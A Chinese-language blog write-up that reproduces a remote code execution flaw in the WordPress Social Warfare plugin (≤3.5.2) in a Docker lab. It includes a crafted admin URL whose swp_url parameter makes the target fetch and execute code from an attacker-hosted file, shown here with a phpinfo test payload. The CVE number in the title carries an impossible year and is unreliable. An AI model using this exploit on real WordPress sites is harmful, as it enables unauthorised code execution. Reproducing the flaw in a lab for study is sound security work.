CVE-2919-9978 wordpress social warfare插件RCE

发表于

0x00 影响范围

1
social-warfare<= 3.5.2

0x01 搭建wordpress

1
2
3
$ docker pull medicean/vulapps:w_wordpress_6
$ docker run -d -p 80:80 medicean/vulapps:w_wordpress_6

浏览器访问

1557991104984

0x02 下载Social Warfare插件

1
2
3
wget https://github.com/warfare-plugins/social-warfare/archive/3.5.2.tar.gz
root@40db189257de:~# tar xvf social-warfare-3.5.2.tar.gz 
root@40db189257de:~# mv social-warfare-3.5.2 /var/www/html/wp-content/

浏览器访问:

1
http://yourvpsip/wp-admin/

登进后台后部署插件,选择social warfare后点击Activate:

1557991646517

左侧多出插件设置:

1557991728437

0x03 漏洞复现

在攻击机的Web根目录部署payload

(tips: centos6开启httpd后,关闭iptables服务)

1
[root@vultr html]# echo "<pre>phpinfo()</pre>" > test.txt

浏览器访问能看到:

1
http://yourattackip/test.txt

1557993239862

构造URL并访问:

1
http://your-targetIP/wp-admin/admin.php?page=social-warfare&swp_debug=load_options&swp_url=http://you-attack-ip/test.txt

1557993667814

复现成功

参考

WordPress Social Warfare组件 远程代码漏洞执行详细复现